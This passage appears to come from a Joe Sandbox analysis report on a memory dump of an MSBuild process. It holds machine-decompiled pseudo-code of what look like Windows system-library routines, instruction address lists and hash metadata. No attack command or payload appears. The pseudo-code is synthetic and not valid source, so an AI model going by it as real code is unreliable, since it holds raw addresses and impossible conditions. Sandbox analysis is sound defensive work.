                                            								_t251 = E01043D43(_t315, _t321, _t157, _v560, _v572, _t305);
                                            								_pop(_t319);
                                            								_pop(_t326);
                                            								_pop(_t257);
                                            								return E0104B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
                                            							}
                                            						}
                                            					} else {
                                            						L2:
                                            						_t260 = _v572;
                                            						goto L3;
                                            					}
                                            				}
                                            				L101:
                                            			}















































































                                            0x01024128
                                            0x01024135
                                            0x0102413c
                                            0x01024141
                                            0x01024145
                                            0x01024147
                                            0x0102414e
                                            0x01024151
                                            0x01024159
                                            0x0102415c
                                            0x01024160
                                            0x01024164
                                            0x01024168
                                            0x0102416c
                                            0x0102417f
                                            0x01024181
                                            0x0102446a
                                            0x0102446a
                                            0x0102418c
                                            0x01024195
                                            0x01024199
                                            0x01024432
                                            0x01024439
                                            0x0102443d
                                            0x01024442
                                            0x01024447
                                            0x00000000
                                            0x0102419f
                                            0x010241a3
                                            0x010241b1
                                            0x010241b9
                                            0x010241bd
                                            0x010245db
                                            0x010245db
                                            0x00000000
                                            0x010241c3
                                            0x010241c3
                                            0x010241ce
                                            0x010241d4
                                            0x0106e138
                                            0x0106e13e
                                            0x0106e169
                                            0x0106e16d
                                            0x0106e19e
                                            0x0106e16f
                                            0x0106e16f
                                            0x0106e175
                                            0x0106e179
                                            0x0106e18f
                                            0x0106e193
                                            0x00000000
                                            0x0106e199
                                            0x00000000
                                            0x0106e199
                                            0x0106e193
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x010241da
                                            0x010241da
                                            0x010241df
                                            0x010241e4
                                            0x010241ec
                                            0x01024203
                                            0x01024207
                                            0x0106e1fd
                                            0x01024222
                                            0x01024226
                                            0x0106e1f3
                                            0x0106e1f3
                                            0x0102422c
                                            0x0102422c
                                            0x01024233
                                            0x0106e1ed
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x01024239
                                            0x01024239
                                            0x01024239
                                            0x01024239
                                            0x01024233
                                            0x01024226
                                            0x010241ee
                                            0x010241ee
                                            0x010241f4
                                            0x01024575
                                            0x0106e1b1
                                            0x0106e1b1
                                            0x00000000
                                            0x0102457b
                                            0x0102457b
                                            0x01024582
                                            0x0106e1ab
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x01024588
                                            0x01024588
                                            0x0102458c
                                            0x0106e1c4
                                            0x0106e1c4
                                            0x00000000
                                            0x01024592
                                            0x01024592
                                            0x01024599
                                            0x0106e1be
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0102459f
                                            0x0102459f
                                            0x010245a3
                                            0x0106e1d7
                                            0x0106e1e4
                                            0x00000000
                                            0x010245a9
                                            0x010245a9
                                            0x010245b0
                                            0x0106e1d1
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x010245b6
                                            0x010245b6
                                            0x010245b6
                                            0x00000000
                                            0x010245b6
                                            0x010245b0
                                            0x010245a3
                                            0x01024599
                                            0x0102458c
                                            0x01024582
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x010241f4
                                            0x0102423e
                                            0x01024241
                                            0x010245c0
                                            0x010245c4
                                            0x00000000
                                            0x010245ca
                                            0x010245ca
                                            0x00000000
                                            0x0106e207
                                            0x0106e20f
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x010245d1
                                            0x00000000
                                            0x00000000
                                            0x010245ca
                                            0x00000000
                                            0x01024247
                                            0x01024247
                                            0x01024247
                                            0x01024249
                                            0x01024249
                                            0x01024249
                                            0x01024251
                                            0x01024251
                                            0x01024257
                                            0x0102425f
                                            0x0102426e
                                            0x01024270
                                            0x0102427a
                                            0x0106e219
                                            0x0106e219
                                            0x01024280
                                            0x01024282
                                            0x01024456
                                            0x010245ea
                                            0x00000000
                                            0x010245f0
                                            0x0106e223
                                            0x00000000
                                            0x0106e223
                                            0x0102445c
                                            0x0102445c
                                            0x00000000
                                            0x0102445c
                                            0x00000000
                                            0x01024288
                                            0x0102428c
                                            0x0106e298
                                            0x01024292
                                            0x01024292
                                            0x0102429e
                                            0x010242a3
                                            0x010242a7
                                            0x010242ac
                                            0x0106e22d
                                            0x010242b2
                                            0x010242b2
                                            0x010242b9
                                            0x010242bc
                                            0x010242c2
                                            0x010242ca
                                            0x010242cd
                                            0x010242cd
                                            0x010242d4
                                            0x0102433f
                                            0x0102433f
                                            0x010242d6
                                            0x010242d6
                                            0x010242d9
                                            0x010242dd
                                            0x010242eb
                                            0x0106e23a
                                            0x010242f1
                                            0x01024305
                                            0x0102430d
                                            0x01024315
                                            0x01024318
                                            0x0102431f
                                            0x01024322
                                            0x0102432e
                                            0x0102433b
                                            0x0102433b
                                            0x00000000
                                            0x0102432e
                                            0x010242eb
                                            0x0102434c
                                            0x0102434e
                                            0x01024352
                                            0x01024359
                                            0x0102435e
                                            0x01024361
                                            0x0102436e
                                            0x0102438a
                                            0x0102438e
                                            0x01024396
                                            0x0102439e
                                            0x010243a1
                                            0x010243ad
                                            0x010243bb
                                            0x010243bb
                                            0x010243ad
                                            0x0102436e
                                            0x010243bf
                                            0x010243c5
                                            0x01024463
                                            0x01024463
                                            0x010243ce
                                            0x010243d5
                                            0x010243d9
                                            0x010243df
                                            0x01024475
                                            0x01024479
                                            0x01024491
                                            0x01024491
                                            0x01024479
                                            0x010243e5
                                            0x010243eb
                                            0x010243f4
                                            0x010243f6
                                            0x010243f9
                                            0x010243fc
                                            0x010243ff
                                            0x010244e8
                                            0x010244ed
                                            0x010244f3
                                            0x0106e247
                                            0x00000000
                                            0x010244f9
                                            0x01024504
                                            0x01024508
                                            0x0102450f
                                            0x0106e269
                                            0x00000000
                                            0x01024515
                                            0x01024519
                                            0x01024531
                                            0x01024534
                                            0x01024537
                                            0x0102453e
                                            0x01024541
                                            0x0102454a
                                            0x0106e255
                                            0x0106e255
                                            0x0106e25b
                                            0x0106e25e
                                            0x0106e261
                                            0x0106e261
                                            0x01024555
                                            0x01024559
                                            0x0102455d
                                            0x0106e26d
                                            0x0106e270
                                            0x0106e274
                                            0x0106e27a
                                            0x0106e27d
                                            0x0106e28e
                                            0x0106e28e
                                            0x01024563
                                            0x01024563
                                            0x01024569
                                            0x01024569
                                            0x00000000
                                            0x0102455d
                                            0x0102450f
                                            0x00000000
                                            0x010244f3
                                            0x010243ff
                                            0x01024405
                                            0x01024405
                                            0x01024405
                                            0x010242ac
                                            0x0102428c
                                            0x01024282
                                            0x01024407
                                            0x0102440d
                                            0x0106e2af
                                            0x0106e2af
                                            0x01024413
                                            0x01024413
                                            0x00000000
                                            0x010241d4
                                            0x00000000
                                            0x010241c3
                                            0x010241bd
                                            0x01024415
                                            0x01024415
                                            0x01024416
                                            0x01024417
                                            0x01024429
                                            0x0102416e
                                            0x0102416e
                                            0x01024175
                                            0x01024498
                                            0x0102449f
                                            0x0106e12d
                                            0x00000000
                                            0x0106e133
                                            0x00000000
                                            0x0106e133
                                            0x010244a5
                                            0x010244a5
                                            0x010244aa
                                            0x00000000
                                            0x010244bb
                                            0x010244ca
                                            0x010244d6
                                            0x010244d7
                                            0x010244d8
                                            0x010244e3
                                            0x010244e3
                                            0x010244aa
                                            0x0102417b
                                            0x0102417b
                                            0x0102417b
                                            0x00000000
                                            0x0102417b
                                            0x01024175
                                            0x00000000

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1ca296f0ab6de7dfe9d9602d4e0b5298ee8ef29e27a43c81547df28f8ffd084c
                                            • Instruction ID: 22a3646ebc82793a50bb8c574d4c03ab4dffee68aa8fc0647939fb0eee808b27
                                            • Opcode Fuzzy Hash: 1ca296f0ab6de7dfe9d9602d4e0b5298ee8ef29e27a43c81547df28f8ffd084c
                                            • Instruction Fuzzy Hash: D9F178746083228BC764CF19C480A7ABBE5FF88714F55896EF9C6CB291E734D885CB52
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 92%
                                            			E010320A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
                                            				signed int _v16;
                                            				signed int _v20;
                                            				signed char _v24;
                                            				intOrPtr _v28;
                                            				signed int _v32;
                                            				void* _v36;
                                            				char _v48;
                                            				signed int _v52;
                                            				signed int _v56;
                                            				unsigned int _v60;
                                            				char _v64;
                                            				unsigned int _v68;
                                            				signed int _v72;
                                            				char _v73;
                                            				signed int _v74;
                                            				char _v75;
                                            				signed int _v76;
                                            				void* _v81;
                                            				void* _v82;
                                            				void* _v89;
                                            				void* _v92;
                                            				void* _v97;
                                            				void* __edi;
                                            				void* __esi;
                                            				void* __ebp;
                                            				signed char _t128;
                                            				void* _t129;
                                            				signed int _t130;
                                            				void* _t132;
                                            				signed char _t133;
                                            				intOrPtr _t135;
                                            				signed int _t137;
                                            				signed int _t140;
                                            				signed int* _t144;
                                            				signed int* _t145;
                                            				intOrPtr _t146;
                                            				signed int _t147;
                                            				signed char* _t148;
                                            				signed int _t149;
                                            				signed int _t153;
                                            				signed int _t169;
                                            				signed int _t174;
                                            				signed int _t180;
                                            				void* _t197;
                                            				void* _t198;
                                            				signed int _t201;
                                            				intOrPtr* _t202;
                                            				intOrPtr* _t205;
                                            				signed int _t210;
                                            				signed int _t215;
                                            				signed int _t218;
                                            				signed char _t221;
                                            				signed int _t226;
                                            				char _t227;
                                            				signed int _t228;
                                            				void* _t229;
                                            				unsigned int _t231;
                                            				void* _t235;
                                            				signed int _t240;
                                            				signed int _t241;
                                            				void* _t242;
                                            				signed int _t246;
                                            				signed int _t248;
                                            				signed int _t252;
                                            				signed int _t253;
                                            				void* _t254;
                                            				intOrPtr* _t256;
                                            				intOrPtr _t257;
                                            				unsigned int _t262;
                                            				signed int _t265;
                                            				void* _t267;
                                            				signed int _t275;
                                            
                                            				_t198 = __ebx;
                                            				_t267 = (_t265 & 0xfffffff0) - 0x48;
                                            				_v68 = __ecx;
                                            				_v73 = 0;
                                            				_t201 = __edx & 0x00002000;
                                            				_t128 = __edx & 0xffffdfff;
                                            				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
                                            				_v72 = _t128;
                                            				if((_t128 & 0x00000008) != 0) {
                                            					__eflags = _t128 - 8;
                                            					if(_t128 != 8) {
                                            						L69:
                                            						_t129 = 0xc000000d;
                                            						goto L23;
                                            					} else {
                                            						_t130 = 0;
                                            						_v72 = 0;
                                            						_v75 = 1;
                                            						L2:
                                            						_v74 = 1;
                                            						_t226 =  *0x10f8714; // 0x0
                                            						if(_t226 != 0) {
                                            							__eflags = _t201;
                                            							if(_t201 != 0) {
                                            								L62:
                                            								_v74 = 1;
                                            								L63:
                                            								_t130 = _t226 & 0xffffdfff;
                                            								_v72 = _t130;
                                            								goto L3;
                                            							}
                                            							_v74 = _t201;
                                            							__eflags = _t226 & 0x00002000;
                                            							if((_t226 & 0x00002000) == 0) {
                                            								goto L63;
                                            							}
                                            							goto L62;
                                            						}
                                            						L3:
                                            						_t227 = _v75;
                                            						L4:
                                            						_t240 = 0;
                                            						_v56 = 0;
                                            						_t252 = _t130 & 0x00000100;
                                            						if(_t252 != 0 || _t227 != 0) {
                                            							_t240 = _v68;
                                            							_t132 = E01032EB0(_t240);
                                            							__eflags = _t132 - 2;
                                            							if(_t132 != 2) {
                                            								__eflags = _t132 - 1;
                                            								if(_t132 == 1) {
                                            									goto L25;
                                            								}
                                            								__eflags = _t132 - 6;
                                            								if(_t132 == 6) {
                                            									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
                                            									if( *((short*)(_t240 + 4)) != 0x3f) {
                                            										goto L40;
                                            									}
                                            									_t197 = E01032EB0(_t240 + 8);
                                            									__eflags = _t197 - 2;
                                            									if(_t197 == 2) {
                                            										goto L25;
                                            									}
                                            								}
                                            								L40:
                                            								_t133 = 1;
                                            								L26:
                                            								_t228 = _v75;
                                            								_v56 = _t240;
                                            								__eflags = _t133;
                                            								if(_t133 != 0) {
                                            									__eflags = _t228;
                                            									if(_t228 == 0) {
                                            										L43:
                                            										__eflags = _v72;
                                            										if(_v72 == 0) {
                                            											goto L8;
                                            										}
                                            										goto L69;
                                            									}
                                            									_t133 = E010058EC(_t240);
                                            									_t221 =  *0x10f5cac; // 0x16
                                            									__eflags = _t221 & 0x00000040;
                                            									if((_t221 & 0x00000040) != 0) {
                                            										_t228 = 0;
                                            										__eflags = _t252;
                                            										if(_t252 != 0) {
                                            											goto L43;
                                            										}
                                            										_t133 = _v72;
                                            										goto L7;
                                            									}
                                            									goto L43;
                                            								} else {
                                            									_t133 = _v72;
                                            									goto L6;
                                            								}
                                            							}
                                            							L25:
                                            							_t133 = _v73;
                                            							goto L26;
                                            						} else {
                                            							L6:
                                            							_t221 =  *0x10f5cac; // 0x16
                                            							L7:
                                            							if(_t133 != 0) {
                                            								__eflags = _t133 & 0x00001000;
                                            								if((_t133 & 0x00001000) != 0) {
                                            									_t133 = _t133 | 0x00000a00;
                                            									__eflags = _t221 & 0x00000004;
                                            									if((_t221 & 0x00000004) != 0) {
                                            										_t133 = _t133 | 0x00000400;
                                            									}
                                            								}
                                            								__eflags = _t228;
                                            								if(_t228 != 0) {
                                            									_t133 = _t133 | 0x00000100;
                                            								}
                                            								_t229 = E01044A2C(0x10f6e40, 0x1044b30, _t133, _t240);
                                            								__eflags = _t229;
                                            								if(_t229 == 0) {
                                            									_t202 = _a20;
                                            									goto L100;
                                            								} else {
                                            									_t135 =  *((intOrPtr*)(_t229 + 0x38));
                                            									L15:
                                            									_t202 = _a20;
                                            									 *_t202 = _t135;
                                            									if(_t229 == 0) {
                                            										L100:
                                            										 *_a4 = 0;
                                            										_t137 = _a8;
                                            										__eflags = _t137;
                                            										if(_t137 != 0) {
                                            											 *_t137 = 0;
                                            										}
                                            										 *_t202 = 0;
                                            										_t129 = 0xc0000017;
                                            										goto L23;
                                            									} else {
                                            										_t242 = _a16;
                                            										if(_t242 != 0) {
                                            											_t254 = _t229;
                                            											memcpy(_t242, _t254, 0xd << 2);
                                            											_t267 = _t267 + 0xc;
                                            											_t242 = _t254 + 0x1a;
                                            										}
                                            										_t205 = _a4;
                                            										_t25 = _t229 + 0x48; // 0x48
                                            										 *_t205 = _t25;
                                            										_t140 = _a8;
                                            										if(_t140 != 0) {
                                            											__eflags =  *((char*)(_t267 + 0xa));
                                            											if( *((char*)(_t267 + 0xa)) != 0) {
                                            												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
                                            											} else {
                                            												 *_t140 = 0;
                                            											}
                                            										}
                                            										_t256 = _a12;
                                            										if(_t256 != 0) {
                                            											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
                                            										}
                                            										_t257 =  *_t205;
                                            										_v48 = 0;
                                            										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
                                            										_v56 = 0;
                                            										_v52 = 0;
                                            										_t144 =  *( *[fs:0x30] + 0x50);
                                            										if(_t144 != 0) {
                                            											__eflags =  *_t144;
                                            											if( *_t144 == 0) {
                                            												goto L20;
                                            											}
                                            											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                                            											goto L21;
                                            										} else {
                                            											L20:
                                            											_t145 = 0x7ffe0384;
                                            											L21:
                                            											if( *_t145 != 0) {
                                            												_t146 =  *[fs:0x30];
                                            												__eflags =  *(_t146 + 0x240) & 0x00000004;
                                            												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
                                            													_t147 = E01027D50();
                                            													__eflags = _t147;
                                            													if(_t147 == 0) {
                                            														_t148 = 0x7ffe0385;
                                            													} else {
                                            														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                                            													}
                                            													__eflags =  *_t148 & 0x00000020;
                                            													if(( *_t148 & 0x00000020) != 0) {
                                            														_t149 = _v72;
                                            														__eflags = _t149;
                                            														if(__eflags == 0) {
                                            															_t149 = 0xfe5c80;
                                            														}
                                            														_push(_t149);
                                            														_push( &_v48);
                                            														 *((char*)(_t267 + 0xb)) = E0103F6E0(_t198, _t242, _t257, __eflags);
                                            														_push(_t257);
                                            														_push( &_v64);
                                            														_t153 = E0103F6E0(_t198, _t242, _t257, __eflags);
                                            														__eflags =  *((char*)(_t267 + 0xb));
                                            														if( *((char*)(_t267 + 0xb)) != 0) {
                                            															__eflags = _t153;
                                            															if(_t153 != 0) {
                                            																__eflags = 0;
                                            																E01087016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
                                            																L01022400(_t267 + 0x20);
                                            															}
                                            															L01022400( &_v64);
                                            														}
                                            													}
                                            												}
                                            											}
                                            											_t129 = 0;
                                            											L23:
                                            											return _t129;
                                            										}
                                            									}
                                            								}
                                            							}
                                            							L8:
                                            							_t275 = _t240;
                                            							if(_t275 != 0) {
                                            								_v73 = 0;
                                            								_t253 = 0;
                                            								__eflags = 0;
                                            								L29:
                                            								_push(0);
                                            								_t241 = E01032397(_t240);
                                            								__eflags = _t241;
                                            								if(_t241 == 0) {
                                            									_t229 = 0;
                                            									L14:
                                            									_t135 = 0;
                                            									goto L15;
                                            								}
                                            								__eflags =  *((char*)(_t267 + 0xb));
                                            								 *(_t241 + 0x34) = 1;
                                            								if( *((char*)(_t267 + 0xb)) != 0) {
                                            									E01022280(_t134, 0x10f8608);
                                            									__eflags =  *0x10f6e48 - _t253; // 0x0
                                            									if(__eflags != 0) {
                                            										L48:
                                            										_t253 = 0;
                                            										__eflags = 0;
                                            										L49:
                                            										E0101FFB0(_t198, _t241, 0x10f8608);
                                            										__eflags = _t253;
                                            										if(_t253 != 0) {
                                            											L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
                                            										}
                                            										goto L31;
                                            									}
                                            									 *0x10f6e48 = _t241;
                                            									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
                                            									__eflags = _t253;
                                            									if(_t253 != 0) {
                                            										_t57 = _t253 + 0x34;
                                            										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
                                            										__eflags =  *_t57;
                                            										if( *_t57 == 0) {
                                            											goto L49;
                                            										}
                                            									}
                                            									goto L48;
                                            								}
                                            								L31:
                                            								_t229 = _t241;
                                            								goto L14;
                                            							}
                                            							_v73 = 1;
                                            							_v64 = _t240;
                                            							asm("lock bts dword [esi], 0x0");
                                            							if(_t275 < 0) {
                                            								_t231 =  *0x10f8608; // 0x0
                                            								while(1) {
                                            									_v60 = _t231;
                                            									__eflags = _t231 & 0x00000001;
                                            									if((_t231 & 0x00000001) != 0) {
                                            										goto L76;
                                            									}
                                            									_t73 = _t231 + 1; // 0x1
                                            									_t210 = _t73;
                                            									asm("lock cmpxchg [edi], ecx");
                                            									__eflags = _t231 - _t231;
                                            									if(_t231 != _t231) {
                                            										L92:
                                            										_t133 = E01036B90(_t210,  &_v64);
                                            										_t262 =  *0x10f8608; // 0x0
                                            										L93:
                                            										_t231 = _t262;
                                            										continue;
                                            									}
                                            									_t240 = _v56;
                                            									goto L10;
                                            									L76:
                                            									_t169 = E0103E180(_t133);
                                            									__eflags = _t169;
                                            									if(_t169 != 0) {
                                            										_push(0xc000004b);
                                            										_push(0xffffffff);
                                            										E010497C0();
                                            										_t231 = _v68;
                                            									}
                                            									_v72 = 0;
                                            									_v24 =  *( *[fs:0x18] + 0x24);
                                            									_v16 = 3;
                                            									_v28 = 0;
                                            									__eflags = _t231 & 0x00000002;
                                            									if((_t231 & 0x00000002) == 0) {
                                            										_v32 =  &_v36;
                                            										_t174 = _t231 >> 4;
                                            										__eflags = 1 - _t174;
                                            										_v20 = _t174;
                                            										asm("sbb ecx, ecx");
                                            										_t210 = 3 |  &_v36;
                                            										__eflags = _t174;
                                            										if(_t174 == 0) {
                                            											_v20 = 0xfffffffe;
                                            										}
                                            									} else {
                                            										_v32 = 0;
                                            										_v20 = 0xffffffff;
                                            										_v36 = _t231 & 0xfffffff0;
                                            										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
                                            										_v72 =  !(_t231 >> 2) & 0xffffff01;
                                            									}
                                            									asm("lock cmpxchg [edi], esi");
                                            									_t262 = _t231;
                                            									__eflags = _t262 - _t231;
                                            									if(_t262 != _t231) {
                                            										goto L92;
                                            									} else {
                                            										__eflags = _v72;
                                            										if(_v72 != 0) {
                                            											E0104006A(0x10f8608, _t210);
                                            										}
                                            										__eflags =  *0x7ffe036a - 1;
                                            										if(__eflags <= 0) {
                                            											L89:
                                            											_t133 =  &_v16;
                                            											asm("lock btr dword [eax], 0x1");
                                            											if(__eflags >= 0) {
                                            												goto L93;
                                            											} else {
                                            												goto L90;
                                            											}
                                            											do {
                                            												L90:
                                            												_push(0);
                                            												_push(0x10f8608);
                                            												E0104B180();
                                            												_t133 = _v24;
                                            												__eflags = _t133 & 0x00000004;
                                            											} while ((_t133 & 0x00000004) == 0);
                                            											goto L93;
                                            										} else {
                                            											_t218 =  *0x10f6904; // 0x400
                                            											__eflags = _t218;
                                            											if(__eflags == 0) {
                                            												goto L89;
                                            											} else {
                                            												goto L87;
                                            											}
                                            											while(1) {
                                            												L87:
                                            												__eflags = _v16 & 0x00000002;
                                            												if(__eflags == 0) {
                                            													goto L89;
                                            												}
                                            												asm("pause");
                                            												_t218 = _t218 - 1;
                                            												__eflags = _t218;
                                            												if(__eflags != 0) {
                                            													continue;
                                            												}
                                            												goto L89;
                                            											}
                                            											goto L89;
                                            										}
                                            									}
                                            								}
                                            							}
                                            							L10:
                                            							_t229 =  *0x10f6e48; // 0x0
                                            							_v72 = _t229;
                                            							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
                                            								E0101FFB0(_t198, _t240, 0x10f8608);
                                            								_t253 = _v76;
                                            								goto L29;
                                            							} else {
                                            								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
                                            								asm("lock cmpxchg [esi], ecx");
                                            								_t215 = 1;
                                            								if(1 != 1) {
                                            									while(1) {
                                            										_t246 = _t215 & 0x00000006;
                                            										_t180 = _t215;
                                            										__eflags = _t246 - 2;
                                            										_v56 = _t246;
                                            										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
                                            										asm("lock cmpxchg [edi], esi");
                                            										_t248 = _v56;
                                            										__eflags = _t180 - _t215;
                                            										if(_t180 == _t215) {
                                            											break;
                                            										}
                                            										_t215 = _t180;
                                            									}
                                            									__eflags = _t248 - 2;
                                            									if(_t248 == 2) {
                                            										__eflags = 0;
                                            										E010400C2(0x10f8608, 0, _t235);
                                            									}
                                            									_t229 = _v72;
                                            								}
                                            								goto L14;
                                            							}
                                            						}
                                            					}
                                            				}
                                            				_t227 = 0;
                                            				_v75 = 0;
                                            				if(_t128 != 0) {
                                            					goto L4;
                                            				}
                                            				goto L2;
                                            			}











































































                                            0x010320a0
                                            0x010320a8
                                            0x010320ad
                                            0x010320b3
                                            0x010320b8
                                            0x010320c2
                                            0x010320c7
                                            0x010320cb
                                            0x010320d2
                                            0x01032263
                                            0x01032266
                                            0x01075836
                                            0x01075836
                                            0x00000000
                                            0x0103226c
                                            0x0103226c
                                            0x01032270
                                            0x01032274
                                            0x010320e2
                                            0x010320e2
                                            0x010320e6
                                            0x010320ee
                                            0x010757dc
                                            0x010757de
                                            0x010757ec
                                            0x010757ec
                                            0x010757f1
                                            0x010757f3
                                            0x010757f8
                                            0x00000000
                                            0x010757f8
                                            0x010757e0
                                            0x010757e4
                                            0x010757ea
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x010757ea
                                            0x010320f4
                                            0x010320f4
                                            0x010320f8
                                            0x010320f8
                                            0x010320fc
                                            0x01032100
                                            0x01032106
                                            0x01032201
                                            0x01032206
                                            0x0103220b
                                            0x0103220e
                                            0x010322a9
                                            0x010322ac
                                            0x00000000
                                            0x00000000
                                            0x010322b2
                                            0x010322b5
                                            0x01075801
                                            0x01075806
                                            0x00000000
                                            0x00000000
                                            0x01075810
                                            0x01075815
                                            0x01075818
                                            0x00000000
                                            0x00000000
                                            0x0107581e
                                            0x010322bb
                                            0x010322bb
                                            0x01032218
                                            0x01032218
                                            0x0103221c
                                            0x01032220
                                            0x01032222
                                            0x010322c2
                                            0x010322c4
                                            0x010322dc
                                            0x010322dc
                                            0x010322e1
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x010322e7
                                            0x010322c8
                                            0x010322cd
                                            0x010322d3
                                            0x010322d6
                                            0x01075823
                                            0x01075825
                                            0x01075827
                                            0x00000000
                                            0x00000000
                                            0x0107582d
                                            0x00000000
                                            0x0107582d
                                            0x00000000
                                            0x01032228
                                            0x01032228
                                            0x00000000
                                            0x01032228
                                            0x01032222
                                            0x01032214
                                            0x01032214
                                            0x00000000
                                            0x01032114
                                            0x01032114
                                            0x01032114
                                            0x0103211a
                                            0x0103211c
                                            0x01032348
                                            0x0103234d
                                            0x01075840
                                            0x01075845
                                            0x01075848
                                            0x0107584e
                                            0x0107584e
                                            0x01075848
                                            0x01032353
                                            0x01032355
                                            0x01032388
                                            0x01032388
                                            0x01032368
                                            0x0103236a
                                            0x0103236c
                                            0x0103238f
                                            0x00000000
                                            0x0103236e
                                            0x0103236e
                                            0x0103218e
                                            0x0103218e
                                            0x01032191
                                            0x01032195
                                            0x01075a03
                                            0x01075a06
                                            0x01075a0c
                                            0x01075a0f
                                            0x01075a11
                                            0x01075a13
                                            0x01075a13
                                            0x01075a19
                                            0x01075a1f
                                            0x00000000
                                            0x0103219b
                                            0x0103219b
                                            0x010321a0
                                            0x01032282
                                            0x01032284
                                            0x01032284
                                            0x01032284
                                            0x01032284
                                            0x010321a6
                                            0x010321a9
                                            0x010321ac
                                            0x010321ae
                                            0x010321b3
                                            0x0103228b
                                            0x01032290
                                            0x01032379
                                            0x01032296
                                            0x01032298
                                            0x01032298
                                            0x01032290
                                            0x010321b9
                                            0x010321be
                                            0x010322a2
                                            0x010322a2
                                            0x010321c4
                                            0x010321c8
                                            0x010321cc
                                            0x010321d0
                                            0x010321d4
                                            0x010321de
                                            0x010321e3
                                            0x01075a29
                                            0x01075a2c
                                            0x00000000
                                            0x00000000
                                            0x01075a3b
                                            0x00000000
                                            0x010321e9
                                            0x010321e9
                                            0x010321e9
                                            0x010321ee
                                            0x010321f1
                                            0x01075a45
                                            0x01075a4b
                                            0x01075a52
                                            0x01075a58
                                            0x01075a5d
                                            0x01075a5f
                                            0x01075a71
                                            0x01075a61
                                            0x01075a6a
                                            0x01075a6a
                                            0x01075a76
                                            0x01075a79
                                            0x01075a7f
                                            0x01075a83
                                            0x01075a85
                                            0x01075a87
                                            0x01075a87
                                            0x01075a8c
                                            0x01075a91
                                            0x01075a97
                                            0x01075a9f
                                            0x01075aa0
                                            0x01075aa1
                                            0x01075aa6
                                            0x01075aab
                                            0x01075ab1
                                            0x01075ab3
                                            0x01075ab9
                                            0x01075aca
                                            0x01075ad4
                                            0x01075ad4
                                            0x01075ade
                                            0x01075ade
                                            0x01075aab
                                            0x01075a79
                                            0x01075a52
                                            0x010321f7
                                            0x010321f9
                                            0x010321fe
                                            0x010321fe
                                            0x010321e3
                                            0x01032195
                                            0x0103236c
                                            0x01032122
                                            0x01032122
                                            0x01032124
                                            0x01032231
                                            0x01032236
                                            0x01032236
                                            0x01032238
                                            0x01032238
                                            0x01032240
                                            0x01032242
                                            0x01032244
                                            0x010759fc
                                            0x0103218c
                                            0x0103218c
                                            0x00000000
                                            0x0103218c
                                            0x0103224a
                                            0x0103224f
                                            0x01032256
                                            0x01032304
                                            0x01032309
                                            0x0103230f
                                            0x0103231e
                                            0x0103231e
                                            0x0103231e
                                            0x01032320
                                            0x01032325
                                            0x0103232a
                                            0x0103232c
                                            0x0103233e
                                            0x0103233e
                                            0x00000000
                                            0x0103232c
                                            0x01032311
                                            0x01032317
                                            0x0103231a
                                            0x0103231c
                                            0x01032380
                                            0x01032380
                                            0x01032380
                                            0x01032384
                                            0x00000000
                                            0x00000000
                                            0x01032386
                                            0x00000000
                                            0x0103231c
                                            0x0103225c
                                            0x0103225c
                                            0x00000000
                                            0x0103225c
                                            0x0103212a
                                            0x01032134
                                            0x01032138
                                            0x0103213d
                                            0x01075858
                                            0x01075863
                                            0x01075863
                                            0x01075867
                                            0x0107586a
                                            0x00000000
                                            0x00000000
                                            0x0107586c
                                            0x0107586c
                                            0x01075871
                                            0x01075875
                                            0x01075877
                                            0x01075997
                                            0x0107599c
                                            0x010759a1
                                            0x010759a7
                                            0x010759a7
                                            0x00000000
                                            0x010759a7
                                            0x0107587d
                                            0x00000000
                                            0x0107588b
                                            0x0107588b
                                            0x01075890
                                            0x01075892
                                            0x01075894
                                            0x01075899
                                            0x0107589b
                                            0x010758a0
                                            0x010758a0
                                            0x010758aa
                                            0x010758b2
                                            0x010758b6
                                            0x010758be
                                            0x010758c6
                                            0x010758c9
                                            0x0107590d
                                            0x01075917
                                            0x0107591a
                                            0x0107591c
                                            0x01075920
                                            0x01075928
                                            0x0107592a
                                            0x0107592c
                                            0x0107592e
                                            0x0107592e
                                            0x010758cb
                                            0x010758cd
                                            0x010758d8
                                            0x010758e0
                                            0x010758f4
                                            0x010758fe
                                            0x010758fe
                                            0x0107593a
                                            0x0107593e
                                            0x01075940
                                            0x01075942
                                            0x00000000
                                            0x01075944
